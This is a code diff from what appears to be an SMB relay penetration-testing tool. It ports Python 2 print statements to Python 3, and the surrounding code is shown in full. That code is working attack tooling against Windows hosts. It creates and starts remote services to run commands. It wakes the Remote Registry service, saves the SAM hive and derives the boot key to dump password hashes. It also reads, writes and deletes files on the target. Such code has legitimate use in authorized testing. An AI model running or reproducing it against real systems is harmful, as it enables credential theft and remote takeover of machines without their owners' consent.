w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService,ControlOperation = "\x01\x00\x00\x00") w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService,ControlOperation = "\x01\x00\x00\x00")
@ -939,7 +939,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLDeleteService. ## DCE/RPC SVCCTLDeleteService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n" print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService)
@ -955,7 +955,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLCloseService ## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to delete the service.\n" print ("[+] Failed to delete the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -990,15 +990,15 @@ def StartWinregService(f, host, data, s):
##Error handling. ##Error handling.
if data[8:10] == "\x2e\x00": if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
## DCE/RPC SVCCTLOpenService. ## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n" print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
#print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars) #print ("[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars))
#ContextHandlerService = data[88:108] #ContextHandlerService = data[88:108]
ContextHandler = data[84:104] ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1016,7 +1016,7 @@ def StartWinregService(f, host, data, s):
## DCE/RPC SVCCTLStartService. ## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n" print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandlerService = data[84:104] ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1033,7 +1033,7 @@ def StartWinregService(f, host, data, s):
## DCE/RPC SVCCTLQueryService. ## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n" print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -1049,7 +1049,7 @@ def StartWinregService(f, host, data, s):
## DCE/RPC SVCCTLCloseService ## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n" print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -1083,15 +1083,15 @@ def StopWinregService(f, host, data, s):
##Error handling. ##Error handling.
if data[8:10] == "\x2e\x00": if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
## DCE/RPC SVCCTLOpenService. ## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n" print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
#print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars) #print ("[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars))
#ContextHandlerService = data[88:108] #ContextHandlerService = data[88:108]
ContextHandler = data[84:104] ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1109,7 +1109,7 @@ def StopWinregService(f, host, data, s):
## DCE/RPC SVCCTLStartService. ## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n" print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandlerService = data[84:104] ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1126,7 +1126,7 @@ def StopWinregService(f, host, data, s):
## DCE/RPC SVCCTLQueryService. ## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to stop the service.\n" print ("[+] Failed to stop the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -1142,7 +1142,7 @@ def StopWinregService(f, host, data, s):
## DCE/RPC SVCCTLCloseService ## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n" print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -1208,7 +1208,7 @@ def SMBOpenFile(Filename, Share, Host, Access, data, s):
data = s.recv(2048) data = s.recv(2048)
if data[8:10] == "\x2d\x22": if data[8:10] == "\x2d\x22":
print "[+] Can't open the file, access is denied (write protected file?)." print ("[+] Can't open the file, access is denied (write protected file?).")
f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack.
#We'll recover that connection.. #We'll recover that connection..
return data, s, f return data, s, f
@ -1239,7 +1239,7 @@ def SMBOpenFile(Filename, Share, Host, Access, data, s):
##OpenAndX. ##OpenAndX.
if data[8:10] == "\x2d\x34": if data[8:10] == "\x2d\x34":
print "[+] The command failed or took to long to complete." print ("[+] The command failed or took to long to complete.")
return data, s return data, s
##all good. ##all good.
@ -1272,13 +1272,13 @@ def SMBOpenFileForWriting(Filename, FileSize, FileContent, Share, Host, Access,
data = s.recv(2048) data = s.recv(2048)
if data[8:10] == "\xa2\x22": if data[8:10] == "\xa2\x22":
print "[+] Can't open the file, access is denied (write protected file?)." print ("[+] Can't open the file, access is denied (write protected file?).")
f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack.
#We'll recover that connection.. #We'll recover that connection..
return data, s, f return data, s, f
if data[8:10] == "\xa2\x35": if data[8:10] == "\xa2\x35":
print "[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename print ("[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename)
f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack.
#We'll recover that connection.. #We'll recover that connection..
return data, s, f return data, s, f
@ -1289,7 +1289,7 @@ def SMBOpenFileForWriting(Filename, FileSize, FileContent, Share, Host, Access,
##OpenAndX. ##OpenAndX.
if data[8:10] == "\xa2\x34": if data[8:10] == "\xa2\x34":
print "[+] The command failed or took to long to complete." print ("[+] The command failed or took to long to complete.")
return data, s return data, s
##all good. ##all good.
@ -1345,7 +1345,7 @@ def GrabAndRead(f, Filename, data, s):
##Do large reads.. ##Do large reads..
if data[8:10] == "\x2e\x00" and struct.unpack("<H", data[61:63])[0] == 65520: if data[8:10] == "\x2e\x00" and struct.unpack("<H", data[61:63])[0] == 65520:
print 'File size: %s'%(GetReadableSize(filesize)) print ('File size: %s'%(GetReadableSize(filesize)))
#Do progress bar for large download, so the pentester doesn't fall asleep while doing a large SMB read operation.. #Do progress bar for large download, so the pentester doesn't fall asleep while doing a large SMB read operation..
#if we're here it's because filesize > 65520. #if we're here it's because filesize > 65520.
first = filesize-65520 first = filesize-65520
@ -1371,9 +1371,9 @@ def GrabAndRead(f, Filename, data, s):
Seconds = (time.time() - start_time) - READTIMEOUT Seconds = (time.time() - start_time) - READTIMEOUT
if Seconds>60: if Seconds>60:
minutes = Seconds/60 minutes = Seconds/60
print 'Downloaded in: %.3g minutes.'%(minutes) print ('Downloaded in: %.3g minutes.'%(minutes))
if Seconds<60: if Seconds<60:
print 'Downloaded in: %.3g seconds'%(Seconds) print ('Downloaded in: %.3g seconds'%(Seconds))
##Close Request ##Close Request
if data[8:10] == "\x2e\x00": if data[8:10] == "\x2e\x00":
@ -1407,7 +1407,7 @@ def UploadAndWrite(f, FileSize, FileContent, data, s):
count = 0 count = 0
bar = 80 bar = 80
start_time = time.time() start_time = time.time()
print 'File size: %s'%(GetReadableSize(FileSize)) print ('File size: %s'%(GetReadableSize(FileSize)))
for i in xrange(count_number): for i in xrange(count_number):
count = count+1 count = count+1
Chunk = FileContent[dataoffset:dataoffset+30000] Chunk = FileContent[dataoffset:dataoffset+30000]
@ -1427,9 +1427,9 @@ def UploadAndWrite(f, FileSize, FileContent, data, s):
Seconds = (time.time() - start_time) - READTIMEOUT Seconds = (time.time() - start_time) - READTIMEOUT
if Seconds>60: if Seconds>60:
minutes = Seconds/60 minutes = Seconds/60
print 'Uploaded in: %.3g minutes.'%(minutes) print ('Uploaded in: %.3g minutes.'%(minutes))
if Seconds<60: if Seconds<60:
print 'Uploaded in: %.3g seconds'%(Seconds) print ('Uploaded in: %.3g seconds'%(Seconds))
##Close Request ##Close Request
if data[8:10] == "\x2f\x00": if data[8:10] == "\x2f\x00":
@ -1460,7 +1460,7 @@ def ReadAndDelete(f, Filename, data, s):
##Do large reads.. ##Do large reads..
if data[8:10] == "\x2e\x00" and struct.unpack("<H", data[61:63])[0] == 65520: if data[8:10] == "\x2e\x00" and struct.unpack("<H", data[61:63])[0] == 65520:
print 'File size: %s'%(GetReadableSize(filesize)) print ('File size: %s'%(GetReadableSize(filesize)))
#Do progress bar for large download, so the pentester doesn't fall asleep while doing a large SMB read operation.. #Do progress bar for large download, so the pentester doesn't fall asleep while doing a large SMB read operation..
#if we're here it's because filesize > 65520. #if we're here it's because filesize > 65520.
first = filesize-65520 first = filesize-65520
@ -1486,9 +1486,9 @@ def ReadAndDelete(f, Filename, data, s):
Seconds = (time.time() - start_time) - READTIMEOUT Seconds = (time.time() - start_time) - READTIMEOUT
if Seconds>60: if Seconds>60:
minutes = Seconds/60 minutes = Seconds/60
print 'Downloaded in: %.3g minutes.\n'%(minutes) print ('Downloaded in: %.3g minutes.\n'%(minutes))
if Seconds<60: if Seconds<60:
print 'Downloaded in: %.3g seconds'%(Seconds) print ('Downloaded in: %.3g seconds'%(Seconds))
##Close Request ##Close Request
if data[8:10] == "\x2e\x00": if data[8:10] == "\x2e\x00":
@ -1550,12 +1550,12 @@ def DeleteAFile(Filename, data, s, Host):
data = s.recv(2048) data = s.recv(2048)
if data[8:10] == "\x06\x21": if data[8:10] == "\x06\x21":
print "[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process." print ("[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process.")
print "[+] Try taskkill /F /IM process_name, then delete the file." print ("[+] Try taskkill /F /IM process_name, then delete the file.")
return data, s return data, s
if data[8:10] == "\x06\x34": if data[8:10] == "\x06\x34":
print "[+] Delete Failed. File not found." print ("[+] Delete Failed. File not found.")
return data, s return data, s
if data[8:10] == "\x06\x00": if data[8:10] == "\x06\x00":
@ -1587,7 +1587,7 @@ def GrabKeyValue(s, f, handler, data, keypath):
## DCE/RPC Query Info. ## DCE/RPC Query Info.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to read the key\n" print ("[+] Failed to read the key\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
ContextHandler = data[84:104] ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1605,7 +1605,7 @@ def GrabKeyValue(s, f, handler, data, keypath):
## DCE/RPC CloseKey. ## DCE/RPC CloseKey.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to close the key\n" print ("[+] Failed to close the key\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCEWinRegCloseKey(ContextHandle=ContextHandler) w = SMBDCEWinRegCloseKey(ContextHandle=ContextHandler)
@ -1689,7 +1689,7 @@ def ConvertValuesToBootKey(JDSkew1GBGData):
Xored = [0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7] Xored = [0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7]
for i in range(len(JDSkew1GBGData)): for i in range(len(JDSkew1GBGData)):
Key += JDSkew1GBGData[Xored[i]] Key += JDSkew1GBGData[Xored[i]]
print 'BootKey: %s' % Key.encode("hex") print ('BootKey: %s' % Key.encode("hex"))
return Key return Key
##########Dump Hashes############# ##########Dump Hashes#############
@ -1700,12 +1700,12 @@ def DumpHashes(data, s, Host):
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable": if f == "PipeNotAvailable":
print "The Windows Remote Registry Service is sleeping, waking it up..." print ("The Windows Remote Registry Service is sleeping, waking it up...")
time.sleep(3) time.sleep(3)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable": if f == "PipeNotAvailable":
print "Retrying..." print ("Retrying...")
time.sleep(5) time.sleep(5)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
@ -1722,7 +1722,7 @@ def DumpHashes(data, s, Host):
##Error handling. ##Error handling.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n" print ("[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##Grab the keys ##Grab the keys
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
@ -1753,14 +1753,14 @@ def DumpHashes(data, s, Host):
Hashes = dump_file_hashes(BootKey, SaveSam_Path+"./Sam-"+Host+".tmp") Hashes = dump_file_hashes(BootKey, SaveSam_Path+"./Sam-"+Host+".tmp")
WriteOutputToFile(Hashes, "./Hash-Dump-"+Host+".txt") WriteOutputToFile(Hashes, "./Hash-Dump-"+Host+".txt")
except: except:
print "[+] Live dump failed, is python-crypto installed? " print ("[+] Live dump failed, is python-crypto installed? ")
pass pass
print "[+] The SAM file was saved in: ./relay-dumps/Sam-"+Host+".tmp and the hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt" print ("[+] The SAM file was saved in: ./relay-dumps/Sam-"+Host+".tmp and the hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt")
return data return data
except: except:
#Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works. #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works.
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##########Save An HKLM Key And Its Subkeys############# ##########Save An HKLM Key And Its Subkeys#############
@ -1771,12 +1771,12 @@ def SaveAKey(data, s, Host, Key):
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable": if f == "PipeNotAvailable":
print "The Windows Remote Registry Service is sleeping, waking it up..." print ("The Windows Remote Registry Service is sleeping, waking it up...")
time.sleep(3) time.sleep(3)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable": if f == "PipeNotAvailable":
print "Retrying..." print ("Retrying...")
time.sleep(5) time.sleep(5)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
@ -1791,14 +1791,14 @@ def SaveAKey(data, s, Host, Key):
##Error handling. ##Error handling.
if data[8:10] == "\x25\x00": if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00": if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n" print ("[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
data,s,handler,f = OpenHKLM(data,s,f) data,s,handler,f = OpenHKLM(data,s,f)
data,s,f = SaveKeyToFile("C:\\Windows\\Temp\\"+Key+".tmp", Key, handler, f, data, s) data,s,f = SaveKeyToFile("C:\\Windows\\Temp\\"+Key+".tmp", Key, handler, f, data, s)
if data[8:10] != "\x25\x00": if data[8:10] != "\x25\x00":
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
data,s = CloseFID(f, data, s) data,s = CloseFID(f, data, s)
data,s,f = SMBOpenFile("\\Windows\\Temp\\"+Key+".tmp", "C", Host, RW, data, s) data,s,f = SMBOpenFile("\\Windows\\Temp\\"+Key+".tmp", "C", Host, RW, data, s)
@ -1814,12 +1814,12 @@ def SaveAKey(data, s, Host, Key):
#After everything has been cleaned up, we write the output to a file. #After everything has been cleaned up, we write the output to a file.
WriteOutputToFile(Output, Host+"-"+Key+".tmp") WriteOutputToFile(Output, Host+"-"+Key+".tmp")
print "[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp" print ("[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp")
return data return data
except: except:
#Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works. #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works.
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##########ReadAFile############# ##########ReadAFile#############
@ -1828,11 +1828,11 @@ def ReadFile(data, s, File, Host):
File = File.replace("/","\\") File = File.replace("/","\\")
data,s,f = SMBOpenFile(File, "C", Host, READ, data, s) data,s,f = SMBOpenFile(File, "C", Host, READ, data, s)
data,s,Output = GrabAndRead(f, File, data, s) data,s,Output = GrabAndRead(f, File, data, s)
print Output print (Output)
return ModifySMBRetCode(data) ##Command was successful, ret true. return ModifySMBRetCode(data) ##Command was successful, ret true.
except: except:
print "[+] Read failed. Remote filename was typed correctly?" print ("[+] Read failed. Remote filename was typed correctly?")
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
def GetAfFile(data, s, File, Host): def GetAfFile(data, s, File, Host):
@ -1841,11 +1841,11 @@ def GetAfFile(data, s, File, Host):
data,s,f = SMBOpenFile(File, "C", Host, READ, data, s) data,s,f = SMBOpenFile(File, "C", Host, READ, data, s)
data,s,Output = GrabAndRead(f, File, data, s) data,s,Output = GrabAndRead(f, File, data, s)
WriteOutputToFile(Output, Host+"-"+File) WriteOutputToFile(Output, Host+"-"+File)
print "[+] Done." print ("[+] Done.")
return ModifySMBRetCode(data) ##Command was successful, ret true. return ModifySMBRetCode(data) ##Command was successful, ret true.
except: except:
print "[+] Get file failed. Remote filename was typed correctly?" print ("[+] Get file failed. Remote filename was typed correctly?")
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
##########UploadAFile############# ##########UploadAFile#############
@ -1857,7 +1857,7 @@ def WriteFile(data, s, File, FileSize, FileContent, Host):
return ModifySMBRetCode(data) ##Command was successful, ret true. return ModifySMBRetCode(data) ##Command was successful, ret true.
except: except:
print "[+] Write failed." print ("[+] Write failed.")
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
##########DeleteAFile############ ##########DeleteAFile############
@ -1868,7 +1868,7 @@ def DeleteFile(data, s, File, Host):
data,s = CloseTID(data, s) data,s = CloseTID(data, s)
return ModifySMBRetCode(data) ##Command was successful, ret true. return ModifySMBRetCode(data) ##Command was successful, ret true.
except: except:
print "[+] Delete operation failed.\n[+] Something went wrong." print ("[+] Delete operation failed.\n[+] Something went wrong.")
data,s = CloseTID(data, s) data,s = CloseTID(data, s)
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
@ -1890,7 +1890,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, Fi
time.sleep(1) time.sleep(1)
data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s) data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s)
data,s,Output = ReadAndDelete(f, LogFile, data, s) data,s,Output = ReadAndDelete(f, LogFile, data, s)
print Output print (Output)
data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
Logs.info('Command executed:') Logs.info('Command executed:')
@ -1900,7 +1900,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, Fi
except: except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else." print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data) return ModifySMBRetCode(data)
##########Runas############# ##########Runas#############
@ -1922,7 +1922,7 @@ def RunAsCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName)
time.sleep(1) time.sleep(1)
data,s,f = SMBOpenFile( LogFile, "C", Host, RW, data, s) data,s,f = SMBOpenFile( LogFile, "C", Host, RW, data, s)
data,s,Output = ReadAndDelete(f, LogFile, data, s) data,s,Output = ReadAndDelete(f, LogFile, data, s)
print Output print (Output)
data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
Logs.info('Command executed:') Logs.info('Command executed:')
@ -1932,7 +1932,7 @@ def RunAsCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName)
except: except:
data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
